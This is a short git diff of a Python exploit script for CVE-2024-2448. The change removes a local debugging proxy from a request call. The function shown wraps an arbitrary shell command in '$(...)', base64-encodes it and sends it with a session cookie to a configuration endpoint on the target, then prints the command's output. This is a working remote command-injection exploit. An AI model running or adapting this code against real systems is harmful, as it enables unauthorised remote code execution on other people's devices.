diff --git a/CVE-2024-2448/CVE-2024-2448.py b/CVE-2024-2448/CVE-2024-2448.py index b4cd8be..072ab31 100644 --- a/CVE-2024-2448/CVE-2024-2448.py +++ b/CVE-2024-2448/CVE-2024-2448.py @@ -31,7 +31,7 @@ def exec_command(cmd, cookie, host): cmd = f"$({cmd} 1>&2)" encoded_cmd = base64.b64encode(cmd.encode()).decode() url = f"{host}/progs/hg_cfg/add_rs/{encoded_cmd}" - response = requests.get(url, headers=get_headers(host, cookie), verify=False, proxies={"https":"http://192.168.0.11:8080"}) + response = requests.get(url, headers=get_headers(host, cookie), verify=False) print(get_cmd_output(response.text)) cleanup(cookie, host)